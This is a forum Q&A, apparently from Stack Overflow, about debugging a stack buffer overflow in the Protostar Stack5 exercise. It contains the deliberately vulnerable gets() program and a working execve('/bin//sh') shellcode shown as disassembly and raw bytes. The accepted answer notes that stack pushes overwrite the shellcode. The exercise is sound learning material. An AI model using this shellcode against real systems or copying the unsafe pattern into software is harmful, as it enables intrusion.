# Bufferoverflow - assembly changes after pushing string to stack

Tags: c, assembly, buffer-overflow

Hey I´m currently doing ProtoStar-Stack5 http://exploit-exercises.lains.space/protostar/stack5/ with following c-code:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
```

Atm im trying to execute shellcode:

```
08048060 <_start>:  
 8048060: 31 c0                 xor    %eax,%eax  
 8048062: 50                    push   %eax  
 8048063: 68 2f 2f 73 68        push   $0x68732f2f  
 8048068: 68 2f 62 69 6e        push   $0x6e69622f  
 804806d: 89 e3                 mov    %esp,%ebx  
 804806f: 89 c1                 mov    %eax,%ecx  
 8048071: 89 c2                 mov    %eax,%edx  
 8048073: b0 0b                 mov    $0xb,%al  
 8048075: cd 80                 int    $0x80  
 8048077: 31 c0                 xor    %eax,%eax  
 8048079: 40                    inc    %eax  
 804807a: cd 80                 int    $0x80
```

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80

when running the overflow in gdb(gef), it executes as expected until pushing the two strings (0x68732f2f and 0x6e69622f) onto the stack. After pushing the second string, the assembly changes from:

```
mov    ebx,esp  
mov    ecx,eax  
mov    edx,eax  
mov    al,0xb  
int    0x80
```

to:

```
mov    ebx,esp  
mov    ecx,eax  
mov    edx,eax  
mov    al,0x2f  
bound  ebp,QWORD PTR [ecx+0x6e]  
das      
das      
jae    0xffffcee4
```

and then segfaults at `bound ebp, QWORD PTR [ecx+0x6e]`
My question now is, why it changes and if the change has to do with the segfault.

Answer (score 2, accepted):

You are executing code from the stack, and then pushing new values to the stack - that why the push is in fact overwriting your shellcode.